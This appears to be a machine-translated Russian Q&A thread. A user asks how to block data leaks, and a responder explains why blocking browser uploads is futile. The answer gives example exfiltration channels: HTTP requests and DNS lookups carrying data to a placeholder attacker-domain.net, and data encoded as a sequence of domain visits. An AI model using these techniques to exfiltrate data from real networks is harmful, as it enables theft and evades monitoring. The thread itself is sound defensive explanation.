Я хочу, чтобы моя сеть была защищена, поэтому загрузка, подключение по почте или другие утечки будут запрещены.
Я попробовал исходящее правило брандмауэра Windows. Но это заставляет закрыть все соединения. Не работает для меня
Пожалуйста, сообщите мне, если есть какой-либо плагин /addOn, чтобы предотвратить загрузку файла браузера / протокол или использование Windows, чтобы запретить загрузку файла.
Спасибо за интересную мою проблему.
Итак, вы хотите предотвратить передачу информации из вашей сети извне вашей сети (например, в Интернет)?
Если компьютер может получить доступ к Интернету из вашей сети (например, если он может просматривать веб-страницы), то предотвращение утечки информации в Интернет практически невозможно.
Позвольте мне привести несколько примеров того, как данные могут быть утечки:
Это то, что вы пытаетесь предотвратить. Можно было бы предотвратить это, но бесполезно, так как есть много других способов.
Злоумышленник может использовать любой браузер для доступа к URL-адресам в такой форме:
http://attacker-domain.net/leak-some-data/DATA-THAT-SHOULD-BE-LEAKED
Ему нужен только специальный сервер, который настроен на сохранение всех запросов.
Злоумышленник может использовать DNS для утечки информации. С помощью любой программы на вашем компьютере, которая имеет доступ в Интернет. Просто заставьте программу попытаться связаться с адресом, подобным этому:
DATA-THAT-SHOULD-BE-LEAKED.attacker-domain.net
Это приведет к запросу DNS с вашего компьютера на сервер DNS. Затем запрос перенаправляется на DNS-сервер attacker-domain.net . Таким образом, злоумышленнику нужен только модифицированный DNS-сервер, который регистрирует полученные запросы.
Злоумышленнику потребуется более одного домена / адреса. Для утечки информации он может использовать схему доступа к этим доменам. Например, чтобы пропустить слово "привет", он мог бы использовать простой браузер и получить доступ к доменам, которые он контролирует, в определенном порядке:
h-attacker-domain.net
e-attacker-domain.net
l-attacker-domain.net
l-attacker-domain.net
o-attacker-domain.net
Очевидно, что можно также использовать двоичный код или иметь несколько доменов, означающих одно и то же и т.д. И т.д.
Это лишь некоторые из многих методов, которые злоумышленник может использовать для передачи информации во внешний мир. Очевидно, что можно объединить некоторые из этих методов, а также использовать шифрование и / или запутывание, чтобы затруднить обнаружение.
Поэтому предотвращение загрузки через браузер более или менее бесполезно.
